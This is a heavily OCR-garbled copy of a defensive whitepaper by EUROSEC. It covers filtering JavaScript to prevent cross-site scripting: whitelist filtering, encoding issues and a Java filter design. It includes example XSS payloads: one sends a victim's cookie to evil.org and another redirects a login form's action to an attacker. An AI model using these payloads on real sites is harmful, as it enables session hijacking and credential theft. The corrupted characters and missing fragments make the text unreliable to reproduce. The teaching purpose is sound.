051207b eurosec draft whitepaper filtering javascript

7/25/2019 051207b EUROSEC Draft Whitepaper Filtering JavaScript

1/31

Filtering JavaScript toPrevent Cross-Site

Scripting

secologic Project

Created by:

EUROSEC Gmb C!i"riertec!ni# $ Sic!er!eit

Sodener Strasse %& '( )-*+,* .ronberg( Germany

/ &001( EUROSEC Gmb C!i"riertec!ni# $ Sic!er!eit


2/31

Version Author Date Notes+20 0+202&001 )ra3t 4ersion

File 5ame:

6&&*%002doc

/ &001( EUROSEC Gmb C!i"riertec!ni# $Sic!er!eit ii


3/31

Abstract

Cross-Site Scripting is one o3 t!e main problems o3 any 7eb-based service2Since 7eb bro8sers s9pport t!e eec9tion o3 commands embedded in 7ebpages to enable dynamic 7eb pages attac#ers can ma#e 9se o3 t!is 3eat9reto en3orce t!e eec9tion o3 malicio9s code in a 9ser;s 7eb bro8ser2JavaScript is t!e most commonly 9sed command lang9age in t!is contet2ltering malicio9s JavaScript code is necessary 3or any7eb application2 =!is paper describes t!e overall problem and elaborateson t!e possibilities to >lter JavaScript in 7eb applications2 'lso a >lteringarc!itect9re is presented t!at allo8s 7eb application developers to >lterJavaScript depending on t!e application need to red9ce t!e danger o3s9ccess39l Cross-Site Scripting attac#s2

/ &001( EUROSEC Gmb C!i"riertec!ni# $Sic!er!eit iii


4/31

=able o3 Content

+


5/31

1 Introduction


6/31

not disting9is! bet8een t!e lang9ages and concentrates

on t!e JavaScript lang9age2=!e most important 3eat9re o3 JavaScript is t!e possibilityto interact 8it! t!e bro8ser to in9ence t!e =DAdoc9ment displayed and also in9ence t!e bro8ser itsel32=!e interaction possibilities di"er depending on t!ebro8ser prod9ct2 Keside a common set o3 39nctions t!atallo8 doc9ment and bro8ser manip9lation additionalproprietary 39nctions may be available2 =!e inter3ace and39nction names also slig!tly di"er 3rom bro8ser tobro8ser ma#ing it !ard 3or 7eb application developers to8rite code t!at is compatible 8it! any bro8ser type or

version2From a sec9rity point o3 vie8 JavaScript;s main39nctionality o3 manip9lating =DA doc9ments c9rrentlyloaded into t!e bro8ser and manip9lating t!e bro8seritsel3 is critical i3 mis9sed by attac#ers2 =!ere3oresec9rity a8are 7eb applications s!o9ld not ma#e 9se o3

JavaScript or m9st implement co9ntermeas9res toprevent its mis9se2 Un3ort9nately today;s 7eb applicationdesigners 3eel a pressing need 3or stylis! GU< designst!at re9ire ecessive 9se o3 JavaScript2 'lso 7ebapplication 3rame8or#s are 9sed t!at are based on

JavaScript 3or client side GU< rendering2 O3ten developerseven don;t #no8 t!at JavaScript code a9tomatically isinserted into 7eb doc9ments2 er can be 9sed toindicate t!at JavaScriptcode 3ollo8s:

javascript:alert(popup window);

S9c! code normally is eec9ted by t!e bro8serimmediately 8!en detected in t!e page2 ne 39nctions t!at are noteec9ted directly and can be called later on2 F9nctionde>nitions can occ9r 8!erever t!e JavaScript code is

inserted2 =o allo8 mod9lariMation o3 code it is possible to

/ &001( EUROSEC Gmb C!i"riertec!ni# $Sic!er!eit &


7/31

p9t code parts in separate >les t!at can be loaded 9sing

t!e optional srcparameter o3 t!e script begin tag as int!e 3ollo8ing eample:

=!e bro8ser loads t!e script code 9sing t!e 9ni3ormreso9rce locator BURA and interprets t!e contentretrieved2 5ormal statements are eec9ted directly andeec9tion o3 statements 8it!in 39nction de>nitions arede3erred 9ntil t!e 39nction is called2

Calling JavaScript 39nctions is s9pported at manylocations inside an =DA doc9ment2 c events occ9rs9c! as initial load o3 t!e doc9ment as t!e 3ollo8ingeample s!o8s:

ned inprior JavaScript environments is called 8!en t!e page iscontaining t!e tag above is loaded2 Ot!er eamples o3event related parameters are:

- on%lic& 3or t!e =DA tags button( c'ec&bo#( radio(lin&( reset( subit

- on%'ane3or t!e =DA tags select( te#t( te#tarea

- on*ubit3or t!e =DA tag *ubitbutton8it!in a +orenvironment

- on,ousever3or any =DA tag2

ned locations 8it!in a =DA doc9mentb9t can occ9r nearly every8!ere2


8/31

displayed by t!e bro8ser 8it! JavaScript or to in9ence

t!e operation o3 t!e bro8ser itsel3 are dangero9s 3eat9resi3 mis9sed2 =!e mis9se potential directly relates to t!e39nctions available 3or a malicio9s programmer2Un3ort9nately JavaScript provides 39ll access to =DAdoc9ments 9sing t!e doc9ment object model B)OD2 'script t!ere3ore can modi3y at least t!e doc9ment it isresiding in arbitrarily: it is also possible to completelydelete t!e doc9ment and create a totally di"erentdoc9ment2 From an attac#ers point o3 vie8 t8o t!ings areo3 special interest: coo#ies associated to a doc9ment andaccess credentials2 JavaScript also provides accesspossibilities to t!ese in3ormation2 =!e coo#ies associated

to a doc9ment can be accessed 9sing t!e 39nction calldocuent.coo&ie and application level access credentialsare o3ten ac9ired 9sing 3orm based login2 ere t!ecredentials are inp9t into inp9t >elds residing in a 3ormenvironment2 Since t!e 3orm is part o3 t!e doc9ment ascript can access all in3ormation in all >elds or can simplymodi3y t!e target URA o3 t!e 3orm2 =!en t!e credentialsare sent to t!e ne8 target( 8!ic! is 9nder t!e control o3t!e attac#er2

=!ese 3e8 eample s!o8( t!at JavaScript;s native 39nctionprovides all possibilities 3or attac#ers( i3 malicio9s script

code can be inserted into a =DA doc9ment2 =o preventt!at script code contained in a doc9ment loaded 3romsome 7eb site accesses doc9ments loaded 3rom someot!er 7eb site( bro8sers do not allo8 access bet8eendoc9ments loaded 3rom di"erent sites Bi2e2 cross-siteaccess2 =!ere3ore attac#ers 9se ot!er tec!ni9es toimplement a cross-site attac#2


9/31

docuent.location('ttp://evil.or/steal.ci2

c=3escape(docuent.coo&ie);)=o attac# t!e attention o3 ot!er 9sers t!e message!eadline is c!oosen appropriately2

- 'ny ot!er 9ser t!at is selecting t!is message isattac#ed( since t!e 9sers bro8ser eec9tes t!e script(8!ic! instr9cts t!e bro8ser to load a ne8 doc9ment3rom t!e attac#ers server 9sing a URA t!at istransmitting t!e 9sers coo#ie to t!e server2

- =!e attac#er can no8 ma#e 9se o3 t!e coo#ie to act9nder t!e identity o3 t!e attac#ed 9sers2 'ttac# anddamage possibilities depend on t!e environment t!eattac# is placed2

7ell per3ormed attac#s 9se sop!isticated code t!at 8illnot provide any attac# indication s9c! as visible redirectsor page distortion2

Reected attac#s are 9sed( i3 t!e malicio9s code can notbe stored at t!e server2 cation2 =!is means 3or eample(t!at t!e application is 8riting 9nmodi>ed val9es o3re9est inp9t parameters into t!e ne8 page delivered tot!e 9ser2


10/31

t!e attac#ers site2

Since URAs m9st not contain speci>c val9es s9c! as plainH t!e script m9st be encoded 9sing URA encoding t!atescapes s9c! val9es2 =!e decoding is per3ormed at t!eserver side a9tomatically since parameter val9es area9tomatically URA encoded by t!e bro8ser:

'ttp://victi.or/loon.pae2usernae= 7887979%script79docuent.+ors757.action7978'ttp79?78@[email protected]@[email protected]&ie78B797879%78@script7979%788

=o 39rt!er disg9ise t!e attac# code t!e 8!ole attac#string co9ld be encoded2 rst2 ltered&o9t2

&=!e more general concept is inp9t validation2

/ &001( EUROSEC Gmb C!i"riertec!ni# $Sic!er!eit *


11/31

2 iltering JavaScript

Protection 3rom malicio9s JavaScript code can beac!ieved at di"erent locations2 First 9sers can protectt!emselves by disabling JavaScript Bor active content ingeneral in t!eir bro8sers2 Un3ort9nately t!is rendersmost o3 t!e modern 7eb sites 9n9sable2 =!ere3ore 7ebapplications m9st protect t!eir 9sers by >ltering o9t

malicio9s JavaScript2

2.1 iltering Input or !utput"

From a conceptional point o3 vie8 >ltering JavaScript toprevent Cross-Site Scripting attac#s can be per3ormed onany data sent to an application as inp9t( or can beper3ormed on t!e o9tp9t sent by t!e application to 7ebbro8sers( or bot!2

7!ile it is clear 8!ic! data to consider as o9tp9t it o3tenis 9nclear 8!ic! data s!o9ld be considered as inp9t 3or a7eb application? From a sec9rity point o3 vie8 t!e 8!ole==P re9est sent to a 7eb application m9st beconsidered inp9t and not only t!e parameter val9es t!atare 3ed by 9sers into =DA inp9t >elds2

Dalicio9s script code can not only be contained in t!ebody o3 an ==P re9est b9t also in t!e !eader2 One m9stalso ta#e into acco9nt t!at t!e attac# target is not a 9sero3 t!e application Bas ass9med so 3ar in t!is paper b9tt!e administrator loo#ing at t!e 7eb server or application

log 8it! a =DA based tool2 =!en script code containedin !eader >elds and stored in t!e log >le may be eec9tedand s!o8 its malicio9s e"ects2 =!9s all data entering t!eapplication m9st be considered 9ntr9sted and m9st bec!ec#ed 3or malicio9s JavaScript code2

Keside t!e direct inp9t by client re9est developers o3 a7eb application m9st also consider ot!er in3ormationso9rces 3rom 8!ic! data is red or imported generally as9ntr9sted2 Consider t!e 3ollo8ing scenario:

/ &001( EUROSEC Gmb C!i"riertec!ni# $Sic!er!eit


12/31

Trusted, untrusted, and tainted input and output

' 7eb application is treating 9ser re9ests as 9ntr9sted

inp9t( b9t also reads data 3rom an internal database2Since t!e database is internal( t!e developer treats t!edata as tr9sted inp9t not re9iring >ltering2Un3ort9nately t!e data is inserted into t!e database byanot!er 7eb application t!at reads t!e data 3rometernal clients2 =!ere3ore t!e data in t!e database m9stbe considered tainted since parts o3 it may stem 3rom9ntr9sted so9rces2 =!is motivates t!at literally all datao8ing into an application m9st be >ltered2

=!e same may be tr9e 3or data sent as application o9tp9tto t!e client2 Since t!is data maybe a mi bet8een

tr9sted( 9ntr9sted( and tainted data it is a good idea to>lter o9tp9t also2 =!is also prevents problems i3 dataso9rces t!at are considered tr9sted are 3o9nd to becompromised 3or any reason2 Since >ltering !as impacton t!e per3ormance one 8o9ld not generally >lter allo9tp9t data in sit9ations 8!ere mass data is processedb9t only parts t!at are not stem 3rom tr9sted so9rces2 ltered t!at are notgenerated by t!e application itsel32 ltered2

/ &001( EUROSEC Gmb C!i"riertec!ni# $Sic!er!eit %


13/31

Filtering Untrusted Output Parts

5ormally a 7eb application generated =DA doc9ment is

constr9cted 3rom di"erent b9ilding bloc#s( so t!at tr9stedand 9ntr9sted parts can be di"erentiated2 =!e sit9ation ismade more comple i3 eternal libraries are 9sed togenerate parts o3 t!e o9tp9t or 9nderlying 3rame8or#sgenerate t!e 8!ole o9tp9t2 rst case t!e library;so9tp9t m9st be considered inp9t and treated according tot!e tr9st in t!e library2 ltering t!at t!e parts 9nder its control do notcontain malicio9s script code2

ltering and o9tp9t >ltering2

2.2 #o$ to ilter JavaScript"

=o prevent Cross-Site Scripting attac#s a simple tas# !asto be per3ormed 3or inp9t >ltering: 'ny JavaScript code int!e inp9t m9st be trans3ormed in a 8ay t!at it is noteec9ted by a bro8ser i3 sent to it2

2.2.1 Input Filtering

/ &001( EUROSEC Gmb C!i"riertec!ni# $Sic!er!eit @


14/31

)epending on t!e 7eb application it may not be s9itable

to simply delete all JavaScript code d9ring inp9t >lteringsince t!e application may be 3or9m so3t8are 9sed toimplement a developer 3or9m 8it! disc9ssions on

JavaScript code2 =!ere3ore script code m9st not bedeleted 3rom 3or9m messages2


15/31

2.2.2 Output Filtering

Similar sit9ations arise 8!en >ltering o9tp9t: i3 anapplication itsel3 is 9sing JavaScript in its =DAdoc9ments it is not a good idea to remove any script codein t!e >nal =DA doc9ments be3ore it is sent to t!e9ser;s bro8ser2 =!ere3ore >ltering as described abovem9st be per3ormed selectively 3or 9ntr9sted or taintedo9tp9t parts2

2.2.3 What to Filter?

7!en it comes to >ltering t!ere are in general t8opotential approac!es:

- Klac#-Aist >ltering

- 7!ite-Aist >ltering

7it! Klac#-Aist >ltering t!e data to be >ltered is searc!ed3or 3orbidden patterns t!at are speci>ed in t!e Klac#-Aist27!ile t!is approac! allo8s easy con>g9ration o3 >lters it!as t!e big disadvantage t!at negative lists tend to be notcomplete2 lter is not able to detect and prevent t!eattac#2

ltering t!e allo8edpatterns are speci>ed2 =!ere3ore i3 ne8 attac# patternsare 9sed t!ey most probably do not matc! any o3 t!eallo8ed patterns i3 t!eses patterns 8!ere constr9ctedcare39lly2 7!ile 9sing positive lists provides goodprotection 3rom attac#s t!ey can be !ard to speci3ydepending on t!e application 9se case2 =!e good ne8s ist!at most 7eb applications are relatively simple 8it!respect to t!e inp9t epected( so t!at 8!ite list de>nitionis simple in many cases also2 'not!er 3eat9re o3 7!ite-

Aists is t!at i3 ne8 tags are available t!ey eplicitly m9stbe incl9ded into t!e list( t!9s a so9nd decision can bemade be3ore t!e ne8 tag is processed by t!e application2=!is also increases t!e overall sec9rity2 Keca9se o3 itssec9rity s!ortcomings Klac#-Aist >ltering 8ill not beconsidered in t!e 3ollo8ing2

ltering2 =!ey are:

-


16/31

entities2

Please note t!at applications may ma#e 9se o3 di"erent>lter strategies 3or inp9t and o9tp9t >ltering2 's 3oreample t!e application does not epect and =DA codeincl9ding script code in its inp9t parameters strict>ltering is per3ormed on inp9t val9es2 lter27!en 9sing 7!ite-Aist >ltering application designers anddevelopers m9st decide on t!e str9ct9re o3 t!e =DAo9tp9t created by t!e application2 ned( 8!ic! tags are allo8ed in t!e o9tp9t2 )ependingon t!e application( di"erent tags may be allo8ed in t!eo9tp9t o3 di"erent parts o3 t!e application2 =!ere3oreseveral 7!ite-Aists may be 9sed 8it!in one application2


17/31

=!e 3ollo8ing table s!o8s 8!ic! =DA tags m9st beconsidered potentially dangero9s beca9se o3 t!eir abilityto contain or re3erence eec9table code:

HTML-Tag Use Risk NSCR


18/31

Code eec9tion9sing javascriptprotocol2

lo8src le to be9sed in styles2


stylebinding: 9rlB222

'lmost any tag URA Ain# to >le to be9sed in styles2


style8idt!:epressionB222

'lmost any tag Eec9table Codee2g2

JavaScript

JavaScriptepression todynamically adj9stt!e tag 8idt!inside styles

Code eec9tion2content09rl222

DE=' URA Ain# to ot!er=DA doc9ment2

/ &001( EUROSEC Gmb C!i"riertec!ni# $Sic!er!eit +,


19/31

Code eec9tion

9sing javascriptprotocol2

7!at a 7!ite-Aist 9sed 3or >ltering in general does is todescribe( 8!ic! tags( 8!ic! tag properties( and 8!ic!

val9es 3or properties are allo8ed in t!e data stream t!atis to be >ltered2

7!en analyMing t!e di"erent tags( tag properties andassociated t!reat potential t!e 3ollo8ing 7!ite-Aistclasses can be identi>ed( t!at implement di"erentrestriction policies 8!en 9sed in applications:

- non=DA 7!ite-Aist: t!e inp9t m9st not contain any=DA mar#9p2 ' >lter 8it! t!is con>g9ration 8illtrans3orm all =DA mar#9p into t!e tetrepresentation by 9sing

- sec9re=DA 7!ite-Aist: t!e inp9t is allo8ed to containsec9re =DA mar#9p2 'll tags or properties allo8ingcode eec9tion( URAs or implementing re3erencesBs9c! as anc!or tags are not allo8ed2

- eposed=DA 7!ite-Aist: t!e inp9t is allo8ed tocontain also =DA mar#9p t!at re9ires t!especi>cation o3 URA s9c! as image tags2 ere t!e

URAs can be restricted according to t!e allo8edprotocols and t!e >le etensions listed2

'ny 39rt!er allo8ance 8ill yield to 9nsec9re =DA datasince 3or eample script tags 8o9ld be allo8ed2

Please note t!at it is important to 8!ic! parts o3 t!e inp9tor o9tp9t data t!e di"erent con>g9red >lters are applied2O3 ca9se it 8o9ld be no good idea to r9n t!e non=DA7!ite-Aist on t!e >nal o9tp9t to be send to a bro8ser i3t!e application is 9sing JavaScript itsel3 3or some39nctionality2

2.% &he Character 'ncoding (roble)

Filtering 3or JavaScript means scanning a data stream 3orspeci>c string patterns considered dangero9s and t!enta#e appropriate actions li#e trans3ormation or deletion2Un3ort9nately t!ere are many c!aracter encodingsavailable t!at are 9sed to represent 3oreign lang9agec!aracters2 =!e c!aracter encoding o3 t!e inp9t data 3or a7eb application is normally indicated in t!e re9est

!eader generated by t!e client bro8ser2 Un3ort9nately

/ &001( EUROSEC Gmb C!i"riertec!ni# $Sic!er!eit +1


20/31

t!is is 9ntr9sted in3ormation( 8!ic! can be 9sed by

attac#ers to mislead t!e application or t!e JavaScript>lter 9sed2 =!ere3ore t!e >rst step in >ltering JavaScriptis to normaliMe t!e inp9t data to speci>c c!aracterencoding2 Since national encodings are not s9ited toprovide a 9ni3orm encoding base Unicode s!o9ld be 9sedinstead2 Un3ort9nately t!ere are several Unicodeencoding sc!emas available2 U=F-% is t!e most commonly9sed2 Since U=F-% is 9sing a variable lengt! encodingsc!ema additional actions m9st be ta#en to avoid t!eproblem o3 illegal U=F-% c!aracter encodings2 =!is is 3oreample t!e case i3 a c!aracter 3or 8!ic! t!e encoding isone byte long is encoded 9sing t8o or more bytes 8!ic!

t!e additional bytes set to Mero2 5evert!eless a simple>lter 8o9ld not matc! dangero9s c!aracters since t!elengt!s o3 t!e c!aracter encodings di"er2 ' JavaScript>lter t!ere3ore m9st !onor t!e c!aracter encoding andma#e s9re t!at only valid encodings are accepted2

Steps to Perform for Filtering

For implementing JavaScript >lters lang9ages t!atinternally 9sing a Unicode representation o3 strings ares9ited best( since t!ey a9tomatically trans3orm nationalc!aracter set c!aracters to t!e Unicode representation2=!is 3or eample is tr9e 3or t!e Java programminglang9age t!at is also o3ten 9sed to implement 7eb

applications2 =!ere3ore t!e JavaScript >lter described in

/ &001( EUROSEC Gmb C!i"riertec!ni# $Sic!er!eit +*


21/31

t!e net c!apter is implemented in Java2

/ &001( EUROSEC Gmb C!i"riertec!ni# $Sic!er!eit +


22/31

% A Java based JavaScript ilter

lter 9sing t!e 7!ite-Aist sc!emadescribed above is s!ortly introd9ced2

%.1 Architecture

=o allo8 easy integration into Java based applications t!e>lter provides a simple inter3ace encaps9lated in t!eclass Dava*cript@ilter2 Ecept 3or t!e constr9ctor publicDava*cript@ilter (*trin +ilter%on+i@ile) t!at iscalled 8it! a con>g9ration >le( only t8o met!ods areprovided allo8ing t8o di"erent access 8ays to t!e >lter:

- t!e >rst met!od provides a Java Stream-basedReader7riter inter3ace:public void +ilter (eader +ilternputE Friter+ilteredutput )

- t!e second met!od provides a String-bases inter3ace:public *trin +ilter (*trin +ilternput*trin)

'n application may t!en create >lter classes 8!ic! asm9c! con>g9rations as needed( to per3orm appropriateinp9t or o9tp9t >ltering2

lter is 9sing an o8n =DAimplementation o3 a =DA parser t!at is based onpattern matc!ing2 =!is 8as necessary since standard=DALDA parser libraries cannot cope 8it! mal3ormed

=DA inp9t2 =!e inp9t >rst is analyMed 9sing t!e =DAparser to b9ild 9p t!e =DA object tree2 =!en t!e act9al>ltering is per3ormed by a >lter class t!at is 9sing t!e>lter table generated by t!e con>g9ration >le reader3rom t!e LDA con>g9ration >le2 Finally t!e >ltered=DA inp9t is ret9rned to t!e application 3or 39rt!erprocessing2 =!e 3ollo8ing pict9re s!o8s t!e overallarc!itect9re:

/ &001( EUROSEC Gmb C!i"riertec!ni# $Sic!er!eit +%


23/31

Overall Filter Architecture

=!e con>g9ration >le is an LDA >le describing t!e

allo8ed =DA tags( tag properties( and val9e pattern2=!e 3ollo8ing s!o8s a simple eample( 8!ic! describest!at anc!or tags are allo8ed to ma#e 9se o3 t!e 're+property( 8!ic! is restricted to t!e protocol descriptorsG110and G110*( allo8s all #ind o3 >le 3ormats and allo8st!e tag properties alin( taretand c'arset:

? 're+ G110

G110* all alin taret c'arset

/ &001( EUROSEC Gmb C!i"riertec!ni# $Sic!er!eit +@


24/31

Example Filter Configuration XML File

=!e 3ollo8ing section provides a s!ort overvie8 on t!ec9rrent 39nctionality provided by t!e JavaScriptFilterimplementation2

%.2 unctionalit*

C9rrently t!e JavaScriptFilter provides t!e 3ollo8ing39nctionality:

- =!e >lter recogniMes all =DA tags and is able toparse also mal3ormed =DA2

- =!e individ9al properties o3 =DA tags arerecogniMed2

- Only t!ose tags and properties are allo8ed to pass t!e>lter t!at are granted by t!e >lter con>g9ration2

- For URA val9es t!e protocol and >le type can berestricted2

- Relative and absol9te URAs are disting9is!ed2

=!9s t!e >lter implementation is providing t!e desired>lter 39nctionality2 lter con>g9rations!ave been de>ned to matc! to di"erent restrictionpolicies de>ned above2

Several tests 8it! =DA inp9t 3rom eisting 7eb sites!ave been s9ccess39lly per3ormed: =!e o9tp9t generatedby t!e >lter 8as as instr9cted by t!e con>g9ration >le2O3 ca9se t!e con>g9ration can be adapted as needed byapplication developers2

C9rrently t!e >lter removes all 9ndesired inp9t and t!e>lter possibilities 3or t!e eposed=DA are limited2 ere

39rt!er 39nctions s!o9ld be added s9c! as a trans3ormpossibility t!at replaces 9ndesired tags 8it! its displayrepresentation or s9c! as 39rt!er >lter possibilities 3orURAs2

/ &001( EUROSEC Gmb C!i"riertec!ni# $Sic!er!eit &0


25/31

+ Su))ar*

ltering JavaScript is important 3or t!e sec9rity o3any 7eb application2 =!e paper motivated t!atapplications s!o9ld per3orm inp9t and o9tp9t >ltering toac!ieve an appropriate level o3 protection 3or its 9sers2 ltering is more sec9ret!an Klac#-Aist >ltering2

For implementing a JavaScript >lter 9sing t!e 7!ite-Aistapproac! dangero9s =DA entities allo8ing scripteec9tion m9st be identi>ed2 Since applications re9iredi"erent #ind o3 >ltering a >lter m9st be con>g9rable tot!e applications need2 ere tree classes o3 7!ite-lists 3or>lter con>g9rations !ave been s!o8n2

' Java-based implementation o3 s9c! a con>g9rable7!ite-Aist >lter !as been per3ormed and s!ortlydescribed in t!is paper2 =ests s!o8 satis3ying >lterres9lts2 =!e >lter 8ill be 39rt!er developed to providemore >lter 39nctionality2

/ &001( EUROSEC Gmb C!i"riertec!ni# $Sic!er!eit &+


26/31

, eerences

,.1 /iterature

JavaScript:

TFlanagan@ Flanagan( )2: JavaScript =!e )e>nitiveG9ide SebastopolUS'( OVReilly $'ssociates(+@@

T.oc!@@ .oc!( S2: JavaScript &2'9age eidelberg(dp9n#t-4erlag( +@@@

T.oc!0+ .oc!( S2: JavaScript 62'9age eidelberg(dp9n#t-4erlag( &00+

T7ootton0+7ooton( C2: JavaScript ProgrammerVsRe3erence Kirming!amU.( 7ro Press Atd(&00+

T7enM06 7enM( C2: JavaScript( das 9m3assendeandb9c! Konn( Galileo Press Gmb( &006

TSorg0, Sorg( 52: Filtern von JavaScript M9r4ermeid9ng von Cross-Site-Scripting-'ttac#en in 7eban8end9ngen( )iplomarbeitFac!!oc!sc!9le F9lda $ EUROSEC Gmb(&00,

Java and HTML:

TFlana@@ Flanagan( ): Java in a 59ts!ell( t!ird editionSebastopolUS'( OVReilly $ 'ssociates(


27/31

P9blis!ing andb9c! B=DA( JavaScript(

CSS( )=DA Poing( FranMisV 4erlag Gmb(&00&

TDXnM0&K DXnM( St2 5e3Mger( 72: =DA $ 7eb-P9blis!ing andb9c! BLDA( )=)s( PerlCG


28/31

#barticles[&1&@%12asp$5o7ebContent

+T'pac!e0+ 'pac!e: Cross Site Scripting t!ttp:ds2ccc2de0%ss

TCG


29/31

!ttp:8882sandsprite2comSle9t!papersss-

paper2ttTCoo#06 Coo#( S2: ' 7eb )eveloperVs G9ide to Cross-

Site-Scripting!ttp:8882giac2orgpracticalGSECSteveZCoo#ZGSEC2pd3

Tendr06 endric#( D2: LSS: Cross site scripting(detection and prevention!ttp:8882megasec9rity2orgEploitsFilesss2pd3

TJo!n06 Jo!nson '2: Cross site scripting: Removing

Deta-C!aracters 3rom 9ser-s9pplied data inCG< scripts 9sing C\( Java and 'SP!ttp:cep!as2netblog&006+06+crossZsiteZscriptingZremovingZmetac!aractersZ3romZ9sers9ppliedZdataZinZcgiZscriptsZ9singZcZjavaZandZasp2!tml

TCross]06K Cross]one: 7ebDail Script


30/31

TRoss06 Ross( 72: =DA::=agFilter - =DA::Parser-

based selective tag remover!ttp:searc!2cpan2org^8ross=DA-=agFilter-0201=agFilter2pm

RC:

TRFC+6% Kerners-Aee( Dasinter( DcCa!ill: Uni3ormReso9rce Aocators BURA +@@,!ttp:8882iet32orgr3cr3c+6%2tt

TRFC+%* 5ebel( Dasinter: Form-based Upload in=DA +@@1!ttp:8882iet32orgr3cr3c+%*2tt

TRFC&00 ergea9( 5icol( 'dams( )9erst:


31/31

'pplications and 7eb Services

!ttp:9mn2dl2so9rce3orge2netso9rce3orgeo8aspO7'SPG9ide4+2+2+2pd3

TS9nJava S9n: Reg9lar Epressions and t!e JavaProgramming Aang9age!ttp:java2s9n2comdevelopertec!nical'rticlesreleases+2,rege

TDeyer06 Deyer( J: 'lles Xber Unicode!ttp:9nicode2e-8or#ers2desMZimZ8eb2p!p

Tsel3=DA' DXnM( S: SEAF=DA!ttp:de2sel3!tml2org

Tsel3=DAK DXnM( S: Comp9ter 9nd gesc!riebeneSprac!e!ttp:sel3!tml2teamone2deintersprac!e2!tm

T76CC!ars 7orld 7ide 7eb Consorti9m: =DA)oc9ment Representation!ttp:8882862org=RREC-!tml,0c!arset2!tml

T76CCD 7orld 7ide 7eb Consorti9m: C!aracterDodel 3or t!e 7orld 7ide 7eb +20:F9ndamentals!ttp:8882862org=Rc!armod

TPP O"iMielle Ent8ic#ler8ebseite M9 PP!ttp:8882p!p2net

051207b eurosec draft whitepaper filtering javascript

Documents